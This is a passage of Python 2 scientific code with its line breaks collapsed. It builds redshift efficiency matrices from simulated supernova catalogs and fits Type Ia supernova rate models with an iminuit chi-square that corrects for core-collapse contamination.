mc[3])) self.realcat.Catalog = self.realcat.Catalog[realCond] ''' self.realcat.Catalog = self.realcat.Catalog[np.abs(self.realcat.Catalog['MURES']*1.0/self.realcat.Catalog['MUERR']) < MURESCuts] print "PostMURESCut Shape" print self.realcat.Catalog.shape if simInd < self.nprint: print "Minimum Fitprob" print np.min(self.realcat.Catalog['FITPROB']) print 'N postcuts' print self.realcat.Catalog['FITPROB'].shape def zSystematic(self, binList = None, nbins = None): assert(0) if nbins is None: try: self.nbins = len(binList) - 1 self.binList = binList except: self.nbins = binList.shape[0] - 1 self.binList = binList else: binList = np.linspace(self.zmin, self.zmax, nbins+1) self.nbins = nbins self.binList = binList if self.shiftFlagData: print "DONT DOUBLE SHIFT" return 0 if not self.shiftFlagSim: oldsimz = self.simcat.Catalog['zPHOT'] oldsimtruez = self.simcat.Catalog['SIM_ZCMB'] stat, bins, binnum = stats.binned_statistic(oldsimz, oldsimz - oldsimtruez, bins = self.binList, statistic = 'mean') self.zBiasShifts = stat newsimz = oldsimz - stat[binnum] assert(np.sum(np.abs(newsimz - oldsimz)) > 0) assert((oldzshape - np.arange(0, oldz.shape[0]).shape[0])< 1) self.shiftFlagSim = True oldz = self.realcat.Catalog['zPHOT'] _,_, binnum = stats.binned_statistic(oldz, oldz , bins = self.binList, statistic = 'mean') newz = oldz - self.zBiasShifts[binnum] oldzshape = oldz.shape[0] self.realcat.Catalog['zPHOT'].put(np.arange(0, oldz.shape[0]), newz) assert(np.sum(np.abs(newz - oldz)) > 0) assert((oldzshape - np.arange(0, oldz.shape[0]).shape[0])< 1) self.simFlagData = True def effCalc(self, fracContamCut = 0.0, nbinsSamp = None, nbinsFit = None, binListSamp = None, binListFit = None, simInd =100): #### Do we want SNIas or all SN for efficiency? import matplotlib as mpl if nbinsSamp is None: try: self.nbinsSamp = len(binListSamp) - 1 self.binListSamp = binListSamp except: self.nbinsSamp = binListSamp.shape[0] - 1 self.binListSamp = binListSamp else: binListSamp = np.linspace(self.zminSamp, self.zmaxSamp, nbinsSamp+1) self.nbinsSamp = nbinsSamp self.binListSamp = binListSamp if nbinsFit is None: try: self.nbinsFit = len(binListFit) - 1 self.binListFit = binListFit except: self.nbinsFit = binListFit.shape[0] - 1 self.binListFit = binListFit else: binListFit = np.linspace(self.zminFit, self.zmaxFit, nbinsFit+1) self.nbinsFit = nbinsFit self.binListFit = binListFit self.typeString = '' #if self.cheatZ: # self.ztype = 'SIM_ZCMB' #else: # self.ztype = 'zPHOT' ''' if (fracContamCut > 0.000000001) & (fracContamCut < 1.0): print " Cutting based on Frac Contam" histTot, binsX, binsY = np.histogram2d(self.simcat.Catalog[ztype], self.simcat.Catalog['MURES'], bins = nbins) histCC, binsX, binsY = np.histogram2d(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) != 1][ztype], self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) != 1]['MURES'], bins = (binsX, binsY)) fracContam = histCC.astype(np.float)/histTot.astype(np.float) for fcRow, i in zip(fracContam, xrange(binsX.shape[0])): for fc, j in zip(fcRow, xrange(binsY.shape[0])): if fc < fracContamCut: continue else: simInBin = (self.simcat.Catalog[ztype] > binsX[i]) & (self.simcat.Catalog[ztype] < binsX[i+1]) & (self.simcat.Catalog['MURES'] > binsY[j]) & (self.simcat.Catalog['MURES'] < binsY[j+1]) realInBin = (self.realcat.Catalog[ztype] > binsX[i]) & (self.realcat.Catalog[ztype] < binsX[i+1]) & (self.realcat.Catalog['MURES'] > binsY[j]) & (self.realcat.Catalog['MURES'] < binsY[j+1]) self.simcat.Catalog = self.simcat.Catalog[np.invert(simInBin)] self.realcat.Catalog = self.realcat.Catalog[np.invert(realInBin)] ''' zPHOTs = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1][self.ztype].astype(float) zTRUEs = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]['SIM_ZCMB'].astype(float) self.typeString = self.typeString + 'A1' print "Type Location A" print "Choice A1" print zPHOTs.shape print zTRUEs.shape print binList counts, zPhotEdges, zTrueEdges, binnumber = scipy.stats.binned_statistic_2d(zPHOTs, zTRUEs, zTRUEs, statistic = 'count', bins = (self.binListFit, self.binListSamp)) assert(zPhotEdges.shape[0] == (self.nbinsFit + 1)) print "Type Location B" print "Choice B1" self.typeString = self.typeString + 'B1' zGenHist, zGenBins = np.histogram(self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'].astype(int) == 1]['GENZ'].astype(float), bins = self.binListSamp) #zSim1Hist, zSim1Bins = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) ==1]['SIM_ZCMB'].astype(float), bins = self.binListSamp) print "counts of zTrue in each zPhot vs zTrue bin" print counts.astype(int) print "zGen Bins" print zGenBins print 'zGen Histogram' print zGenHist print "sum zGen events" print np.sum(zGenHist) print "sum zPhot events" print np.sum(counts) #print "DEBUG HERE" #assert(0) self.effmat = np.zeros((self.nbinsFit, self.nbinsSamp)) xMax = zPhotEdges.shape[0] - 2 yMax = zTrueEdges.shape[0] - 2 print zGenHist print counts.astype(int) ''' for zPhotLedge, zPhotRedge, row, i in zip(zPhotEdges[:-1], zPhotEdges[1:], counts, xrange(xMax + 1)): zPhotCenter = (zPhotLedge + zPhotRedge)/2.0 for zTrueLedge, zTrueRedge, count, j in zip(zTrueEdges[:-1], zTrueEdges[1:], row, xrange(yMax + 1)): zTrueCenter = (zTrueLedge + zTrueRedge)/2.0 inCell = (zPHOTs > zPhotLedge) & (zPHOTs < zPhotRedge) & (zTRUEs > zTrueLedge)& (zTRUEs < zTrueRedge) zPhotCell = zPHOTs[inCell];zTrueCell = zTRUEs[inCell] self.effmat[i][j] = count # np.sum(inCell) #print "inCell" #print np.sum(inCell) #print "count" #print count #try: # assert(np.abs(np.sum(inCell) - count) < 2) #except: # print "CHECK ABOVE" for row, i in zip(self.effmat, xrange(self.effmat.shape[0])): for j in xrange(row.shape[0]): self.effmat[i][j] /= zGenHist[j] ''' self.effmat = counts/zGenHist #if simInd < self.nprint: print 'effmat' print self.effmat extent = [zPhotEdges[0], zPhotEdges[-1], zTrueEdges[0], zTrueEdges[-1]] if (simInd == 0) or (not ('sim' in self.realName.lower())): plt.figure() plt.imshow(np.flipud(counts.T), extent = extent, cmap = 'Blues') plt.colorbar() plt.savefig(self.realName + 'redshiftDistro.png') plt.clf() plt.close() plt.figure() plt.imshow(np.flipud(self.effmat.T), extent = extent, cmap = 'Blues', norm=mpl.colors.LogNorm()) plt.colorbar() plt.savefig(self.realName + 'efficiencyMatrixLog.png') plt.clf() plt.close() plt.figure() plt.imshow(np.flipud(self.effmat.T), extent = extent, cmap = 'Blues') plt.colorbar() plt.savefig(self.realName + 'efficiencyMatrix.png') plt.clf() plt.close() def fit_rate(self, fixK = False, fixBeta = False, simInd =100, trueBeta = 0, CCScale = 1.0, CCScaleErr = None, TrueCCScale = 1.0, BetaInit = 0.0, kInit = 1.0, BetaErr = 1, kErr = 1, f_Js = None, CCZbins = None, scaleZBins = None, Blind = False): #import iminuit as iM #from iminuit import Minuit as M #import numpy as np #import matplotlib as mpl #import matplotlib.pyplot as plt #if self.cheatZ: # self.ztype = 'SIM_ZCMB' #else: # self.ztype = 'zPHOT' plt.switch_backend('Agg') if simInd < self.nprint: print "Type Location C" print "Choice C1" if len(self.typeString) <= 4: self.typeString = self.typeString + 'C1' nSim, simBins = np.histogram(self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'].astype(int) == 1]['GENZ'].astype(float), bins=self.binListSamp) if simInd < self.nprint: print "nSim1" print nSim print self.simgencat.Catalog.shape print "FIGURE OUT WHY YOU MADE THIS ASSERT STATEMENT LATER" #assert(0) nSim2, simBins2 = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) ==1][self.ztype].astype(float), bins=self.binListFit) nSim3, simBins3 = np.histogram(self.simcat.Catalog[self.ztype].astype(float), bins=self.binListFit) NCC , _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1][self.ztype].astype(float), bins=self.binListFit) if self.fixCCScale: print "Fix CC Scale at 1" else: if simInd < self.nprint: print "nSim2" print nSim2 print "nSim3" print nSim3 print "nCC" print NCC OrigNCC = np.copy(NCC) if self.cheatCCSub: if self.cheatCCScale: print "WARNING: Only cheating on CC Subtraction not scale" print "Setting NCC to infinity to make sure that cheating correctly" print "Diagnostics after this point may be nonsense" print self.cheatCCSub print "NCC BeforeFck" print NCC NCC = NCC*1E100 print "NCC AfterFck" print NCC elif self.cheatCCScale: print "NCC Before1" print NCC print TrueCCScale NCC = applyCCScale(NCC, TrueCCScale, CCScaleErr, zbins = CCZbins, datazbins = self.binListFit) print "NCC After1" print NCC else: print "NCC Before2" print NCC print CCScale NCC = applyCCScale(NCC, CCScale, CCScaleErr, zbins = CCZbins, datazbins = self.binListFit) print "NCC After2" print NCC #assert(0) NIa , _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1][self.ztype].astype(float), bins=self.binListFit) ''' DebugNIaPhot, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]['zPHOT'].astype(float), bins=self.binListFit) DebugNCCPhot, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1]['zPHOT'].astype(float), bins=self.binListFit) DebugNCCPhot = applyCCScale(DebugNCCPhot, CCScale, CCScaleErr, zbins = scaleZBins, datazbins = self.binListFit) DebugNIaTrue, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]['SIM_ZCMB'].astype(float), bins=self.binListSamp) DebugNCCTrue, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1]['SIM_ZCMB'].astype(float), bins=self.binListSamp) DebugNCCTrue = applyCCScale(DebugNCCTrue, CCScale, CCScaleErr, zbins = scaleZBins, datazbins = self.binListSamp) uselessCtr = 0 for niap, nccp, niat, ncct, zp, zt in zip(DebugNIaPhot, DebugNCCPhot, DebugNIaTrue, DebugNCCTrue,(self.binListFit[1:] + self.binListFit[:-1])/2.0, (self.binListSamp[1:] + self.binListSamp[:-1])/2.0 ): uselessCtr +=1 self.globalZTrueBinStorage.append(zt) self.globalZPhotBinStorage.append(zp) self.globalNDataIaPhotBinStorage.append(niap) self.globalNDataCCPhotBinStorage.append(nccp) self.globalNDataIaTrueBinStorage.append(niat) self.globalNDataCCTrueBinStorage.append(ncct) print "UselessCtr" print uselessCtr ''' try: TrueNCC, _ = np.histogram(self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'] !=1][self.ztype].astype(float), bins=self.binListFit) if simInd < self.nprint: print "True NCC Data" print TrueNCC except: print "Using real data" TrueNCC = 0.0 nData, dataBins = np.histogram(self.realcat.Catalog[self.ztype].astype(float), bins=self.binListFit) print "nData" print nData if not(self.cheatCCSub): FracBad = NCC*1.0/(1.0*(NCC+NIa)) nCCData = nData*FracBad else: nCCData = TrueNCC*1.0 FracBad = TrueNCC*1.0/nData if simInd < self.nprint: print "PreScale NCC/nSim" print OrigNCC*1.0/(OrigNCC+NIa) print "PreScale Pred NCC Data" print OrigNCC*1.0/(OrigNCC+NIa)*nData print "PreScale Pred NCC Data if 2NCC" print OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData print "TrueNCC" print TrueNCC if type(TrueNCC) != int: if simInd < self.nprint: print "PreScale PredNCCData - TrueNCCData" print OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC print "PreScale PredNCCData - TrueNCCData/ PredNCCData" print (OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC)/(OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData) else: print "Using real data" print "Mean of PreScale PredNCCData - TrueNCCData/ PredNCCData" print np.nanmean((OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC)/(OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData)) print "PostScale NCC/nData" print NCC*1.0/(NCC+NIa) if simInd < self.nprint: print "Fraction of CCs in each bin" print FracBad print 'NCC' print NCC print 'nSim2' print nSim2 print "nData, dataBins, realcat shape pre contam correction" print nData print dataBins print np.sum(self.realcat.Catalog[self.ztype].astype(float) > self.zmaxFit) print np.sum(self.realcat.Catalog[self.ztype].astype(float) < self.zminFit) print self.realcat.Catalog[self.ztype].shape print "Ratio nData/nSim" print 1.0*nData/(1.0*nSim3) print "Ratio nSim2/nData" print 1.0*nSim3/(1.0*nData) print "FracBad" print FracBad print 'NCCData' print nCCData if simInd < self.nprint: print "overall Contam" print np.sum(NCC)*1.0/(np.sum(nSim3)*1.0) def chi2func(nData, nSim, effmat, fnorm, zCentersSamp, zCentersFit, k = 1.0, Beta = 0.0, zBreak = 1.0, dump = False, complexdump = False, modelError = False, nIA = None, nCC = None, Rate_Model = 'powerlaw', zbins = None, simInd = 100, BetaPrior = (-3, 3), KPrior = (0.0, 50.0), priorRate = None, priorZEff = None, ratePriorErrUp = None, ratePriorErrDown =None, ratePriorErrAll = None, TrueNCCData = None, f_1 = 1.0, f_2 = 1.0, f_3 = 1.0, f_4 = 1.0, f_5 = 1.0, f_6 = 1.0, f_7 = 1.0, f_8 = 1.0, f_9 = 1.0, f_10 = 1.0, f_11 = 1.0): if simInd < self.nprint: print "PRIORS2" print priorRate print priorZEff print ratePriorErrUp print ratePriorErrDown Chi2Temp = 0.0 if Rate_Model == 'powerlaw': f_Js = k*(1+zCentersSamp)**Beta elif Rate_Model == 'discrete': f_Js = np.array([f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11]) elif (Rate_Model == 'brokenpowerlaw') | (Rate_Model == 'brokenpowerlawVar'): f_Js = [] #zCenters = (zbins[1:]+zbins[:-1])/2.0 temp = None for zC in zCentersSamp: if zC < zBreak: f_Js.append(k*(1+zC)**Beta) elif not(temp is None): f_Js.append(temp) else: temp = f_Js[-1] f_Js.append(temp) f_Js = np.array(f_Js) else: assert(0) if simInd < self.nprint: if Rate_Model == 'discrete': print "f_Js init" print f_Js else: print "Beta init" print Beta print "k init" print k #chi2Mat = np.zeros((self.nbinsFit)) #adjNMC = np.zeros((self.nbinsFit)) if Rate_Model == 'discrete': kprior = 0 betaprior = 0 else: kprior = weakPrior(k, KPrior) betaprior = weakPrior(Beta, BetaPrior) if dump and (self.nprint > simInd): print "kprior" print kprior print "betaprior" print betaprior if (nIA is None) or (nCC is None): if dump: print "No CC Cut" fracCCData = np.zeros(nData.shape) elif self.cheatCCSub: fracCCData = TrueNCC*1.0/nData else: if Rate_Model == 'discrete': if dump and (self.nprint > simInd): print 'f_J adjusted CC Cut' print Rate_Model print nCC print nIA print np.array(f_Js) fracCCData = (nCC*1.0)/((1.0*nCC + nIA*np.array(f_Js))) print fracCCData else: if dump and (self.nprint > simInd): print "Beta Adjusted CC Cut" print Rate_Model #BetaRatio = k*(1+zCenters)**(Beta)#/(1+zCenters)**MCBeta BetaRatio = (1+zCentersFit)**(Beta)#/(1+zCenters)**MCBeta if dump and (self.nprint > simInd): print "Beta Ratio" print BetaRatio print "BadFracCCData" print (nCC*1.0)/((1.0*nCC + nIA*BetaRatio)) print "bad NCCData" print (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))*nData fracCCData = (nCC*1.0)/((1.0*nCC + nIA*BetaRatio)) if dump and (self.nprint > simInd): print 'abc' print "fracCCData2" print fracCCData print "unscaled fracCCData" print (1.0*nCC)/(1.0*(nCC+nIA)) if self.cheatCCSub: nCCData = TrueNCCData if dump and (self.nprint < simInd): print "Cheating CC Sub" assert(not(TrueNCCData is None)) elif dump and (self.nprint > simInd): print 'def' print "Normal CC Sub" if not self.cheatCCSub: nCCData = nData*fracCCData if dump and (self.nprint > simInd): print "nCCData2" print nCCData if not(TrueNCCData is None): print "TrueNCCData" print TrueNCCData #print f_Js #Check if I am scaling errors down with increasing MC size. Make MC twice as large as "Data" to test. if dump: chi2Storage = [] if dump: scaledNSimStor = [] if dump: JSumTempNumStor = [] if dump: JSumTempDenStor = [] if dump: print "actually used NCC" #print nCC print nCCData if dump and (simInd < self.nprint): print "effmat" print effmat print "nData" print nData print "nCCData" print nCCData print "nSim" print nSim print nCCData for row, nDataI, nCCDataI, i, zc in zip(effmat, nData, nCCData, range(self.nbinsFit), zCentersFit): if dump and (self.nprint > simInd): print 'effmat row' print row print 'nDataI' print nDataI print 'nCCDataI' print nCCDataI scaledNSimTemp = 0.0 JSumTempNum = 0.0 JSumTempDen = 0.0 if dump and (simInd < self.nprint): print "nBinsSamp" print self.nbinsSamp assert(row.shape[0] == self.nbinsSamp) assert(nSim.shape[0] == self.nbinsSamp) assert(len(f_Js) == self.nbinsSamp) for eff, nSimJ, f_J, j in zip(row, nSim, f_Js, range(self.nbinsSamp)): if dump and (self.nprint > simInd): print 'NGen J' print nSimJ print 'JSumTempNum contr' print nSimJ*f_J*eff*fnorm print 'JSumTempDen contr' print nSimJ*f_J*eff*fnorm*f_J*fnorm #if dump and (i != j) and self.cheatZ and (self.nprint < simInd): # if nSimJ*f_J*eff*fnorm > 0: # print " This should be zero but isnt " # print nSimJ*f_J*eff*fnorm # assert(0) JSumTempNum += nSimJ*f_J*eff*fnorm JSumTempDen += nSimJ*f_J*eff*fnorm*f_J*fnorm dataFunc = np.maximum(nDataI ,1) #CCFunc = np.ceil(np.maximum(nCCDataI, 1)) CCFunc = np.maximum(nCCDataI, 1) c2t = (nDataI - nCCDataI - JSumTempNum)**2/( dataFunc + CCFunc + JSumTempDen) if dump: JSumTempNumStor.append(JSumTempNum) JSumTempDenStor.append(JSumTempDen) if dump and (self.nprint > simInd): print i print 'nDataI' print nDataI print 'fnCCDataI' print nCCDataI print 'fnorm' print fnorm print "JSumTempNum tot" print JSumTempNum print "JSumTempDen tot" print JSumTempDen print "Chi2Bin" print c2t if dump: chi2Storage.append(c2t) if c2t > 5: print 'INSANITY CHECK ABOVE' # Chi2Temp += ((nDataI - nCCDataI - JSumTempNum)**2/(JSumTempNum + JSumTempDen))#*fnorm**2 if nDataI > 1E-11 or JSumTempDen > 1E-11: Chi2Temp += c2t if dump and (self.nprint > simInd): print "JSumTempNum/Den" print JSumTempNumStor print JSumTempDenStor if dump: if (self.nprint >simInd): print Chi2Temp print kprior print betaprior print chi2Storage print "nData" print nData print "nCCData" print nCCData if priorRate is None: return Chi2Temp+kprior+betaprior , chi2Storage else: print "PRIORS3" print priorRate print "fit k" print k print 'MCK' print self.MCK print "fit beta" print Beta print 'MCBeta' print self.MCBeta print ratePrior(k*self.MCK, Beta + self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll) return Chi2Temp+kprior+betaprior + ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll), chi2Storage else: if dump and (self.nprint > simInd): print 'C2T' print Chi2Temp print kprior print betaprior if priorRate is None: return Chi2Temp+kprior+betaprior else: print "PRIORS3" print priorRate print "fit k" print k print 'MCK' print self.MCK print "fit beta" print Beta print 'MCBeta' print self.MCBeta print ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll) return Chi2Temp+kprior+betaprior + ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll) zCentersSamp = (self.binListSamp[1:] + self.binListSamp[:-1])/2.0 zCentersFit = (self.binListFit[1:] + self.binListFit[:-1])/2.0 #Is this right? Everything else in the other side of the chi2 function should be Ia only if self.cheatCCSub: self.fracCCData = TrueNCC*1.0/nData else: self.fracCCData = (NCC*1.0)/(1.0*(NCC + NIa)) if (self.nprint > simInd): print "nSim" print nSim print 'fracCCData' print self.fracCCData print "nData" print nData #fnorm = float(np.sum(nData*(1-self.fracCCData)))/float(np.sum(nSim)) fnorm = 1.0/240.0 #print "PRIORS" #print self.priorZEff #print self.priorRate #print self.ratePriorErrUp #print self.ratePriorErrDown if self.Rate_Model == 'powerlaw': lamChi2 = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit) lamChi2Dump = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit) MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta) c2i, _ = lamChi2Dump(1.0, 0.0) print "Chi2 init = {0}".format(round(c2i, 4)) elif self.Rate_Model == 'brokenpowerlaw': lamChi2 = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlaw', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit) lamChi2Dump = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, 1.0, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlaw', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit) MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta) c2i, _ = lamChi2Dump(1.0, 0.0) print "Chi2 init = {0}".format(round(c2i, 4)) elif self.Rate_Model == 'brokenpowerlawVar': lamChi2 = lambda k, Beta, zBreak: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, zBreak, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlawVar', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit) lamChi2Dump = lambda k, Beta, zBreak: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, zBreak, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlawVar', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit) MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta, zBreak = 1.0, error_zBreak = 0.1, limit_zBreak = (self.zminFit, self.zmaxFit)) c2i, _ = lamChi2Dump(1.0, 0.0) print "Chi2 init = {0}".format(round(c2i, 4)) elif self.Rate_Model == 'discrete': lamChi2 = lambda f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, f_1 = f_1, f_2 = f_2,f_3 = f_3, f_4 = f_4,f_5 = f_5, f_6 = f_6,f_7 = f_7, f_8 = f_8,f_9 = f_9, f_10 = f_10, f_11 = f_11, Rate_Model = 'discrete', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit ) lamChi2Dump = lambda f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, f_1 = f_1, f_2 = f_2,f_3 = f_3, f_4 = f_4,f_5 = f_5, f_6 = f_6,f_7 = f_7, f_8 = f_8,f_9 = f_9, f_10 = f_10, f_11 = f_11, dump = True, Rate_Model = 'discrete', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit) c2i, _ = lamChi2Dump(1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0) print "Chi2 init = {0}".format(round(c2i, 4)) MinObj = M(lamChi2, f_1 = 1.0, error_f_1 = 1.0, limit_f_1 = (0.0, None), f_2 = 1.0, error_f_2 = 1.0, limit_f_2 = (0.0, None), f_3 = 1.0, error_f_3 = 1.0, limit_f_3 = (0.0, None), f_4 = 1.0, error_f_4 = 1.0, limit_f_4 = (0.0, None), f_5 = 1.0, error_f_5 = 1.0, limit_f_5 = (0.0, None), f_6 = 1.0, error_f_6 = 1.0, limit_f_6 = (0.0, None), f_7 = 1.0, error_f_7 = 1.0, limit_f_7 = (0.0, None), f_8 = 1.0, error_f_8 = 1.0, limit_f_8 = (0.0, None), f_9 = 1.0, error_f_9 = 1.0, limit_f_9 = (0.0, None), f_10 = 1.0, error_f_10 = 1.0, limit_f_10 = (0.0, None), f_11 = 1.0,error_f_11 = 1.0, limit_f_11 = (0.0, None)) if self.Rate_Model == 'discrete': c2f, c2stor = lamChi2Dump(MinObj.values['f_1'],MinObj.values['f_2'],MinObj.values['f_3'],MinObj.values['f_4'],MinObj.values['f_5'],MinObj.values['f_6'],MinObj.values['f_7'],MinObj.values['f_8'],MinObj.values['f_9'],MinObj.values['f_10'],MinObj.values['f_11']) else: print "TEST DUMP HERE" c2f, c2stor = lamChi2Dump(MinObj.values['k'], MinObj.values['Beta']) #MinObj = M(lamChi2, k = 1.0, fix_k = True, Beta = 0.0, error_Beta = 0.1) MinObj.set_strategy(2) fmin, param = MinObj.migrad(nsplit= 10) #fmin, param = MinObj.migrad() #ErrDict = MinObj.minos() self.covar = MinObj.np_covariance() ErrDict = MinObj.minos(maxcall = 1000) #plt.scatter(nData, c2stor) #plt.xlabel('nData') #plt.ylabel('chi2 in bin') #plt.savefig(self.realName + 'Chi2VsnData.png') #plt.clf() if self.nprint > simInd: print "Shapes of things" print len(c2stor) print nData.shape print dataBins.shape print self.binListFit.shape print self.binListSamp.shape #print DebugNIaPhot.shape #print DebugNCCPhot.shape #print DebugNIaTrue.shape #print DebugNCCTrue.shape for c2, nd in zip(c2stor, nData): self.globalChi2Storage.append(c2) self.globalNDataStorage.append(nd) if self.Rate_Model == 'discrete': fJList = [MinObj.values['f_1'],MinObj.values['f_2'],MinObj.values['f_3'],MinObj.values['f_4'],MinObj.values['f_5'],MinObj.values['f_6'],MinObj.values['f_7'],MinObj.values['f_8'],MinObj.values['f_9'],MinObj.values['f_10'],MinObj.values['f_11']] fJErrList = [MinObj.errors['f_1'],MinObj.errors['f_2'],MinObj.errors['f_3'],MinObj.errors['f_4'],MinObj.errors['f_5'],MinObj.errors['f_6'],MinObj.errors['f_7'],MinObj.errors['f_8'],MinObj.errors['f_9'],MinObj.errors['f_10'],MinObj.errors['f_11']] self.fJList = fJList self.fJErrList = fJErrList self.Beta = None self.k = None self.kErr = None self.BetaErr = None print fJList print fJErrList else: k = MinObj.values['k'] #kErr = MinObj.errors['k'] kErr = (np.abs(ErrDict['k']['lower']) + np.abs(ErrDict['k']['upper']))/2.0 Beta = MinObj.values['Beta'] #BetaErr = MinObj.errors['Beta'] BetaErr = (np.abs(ErrDict['Beta']['lower']) + np.abs(ErrDict['Beta']['upper']))/2.0 if self.Rate_Model == 'brokenpowerlawVar': zBreak = MinObj.values['zBreak'] zBreakErr = MinObj.values['zBreakErr'] self.k = k self.Beta = Beta self.kErr = kErr self.BetaErr = BetaErr #/(self.nbins - 2) self.BetaRatio = (1+zCentersFit)**(Beta) self.fJList = None print 'SCALE DEBUG' print NCC print NIa print self.BetaRatio print 'SCALE DEBUG2' print np.sum(NCC) print np.sum(NIa) print np.sum(NIa*self.BetaRatio) self.fracCCData = (NCC*1.0)/(1.0*(1.0*NCC + NIa*self.BetaRatio)) self.fracCCDataTot = (np.sum(NCC)*1.0)/(1.0*(1.0*np.sum(NCC) + np.sum(NIa*self.BetaRatio))) print 'SCALE DEBUG3' print self.fracCCData print self.fracCCDataTot print 'SCALE DEBUG4' print OrigNCC print np.sum(OrigNCC) print CCScale #print self.fracCCDataTot #print type(self.fracCCDataTot) #assert(type(self.fracCCDataTot) == float) print "Chi2 final = 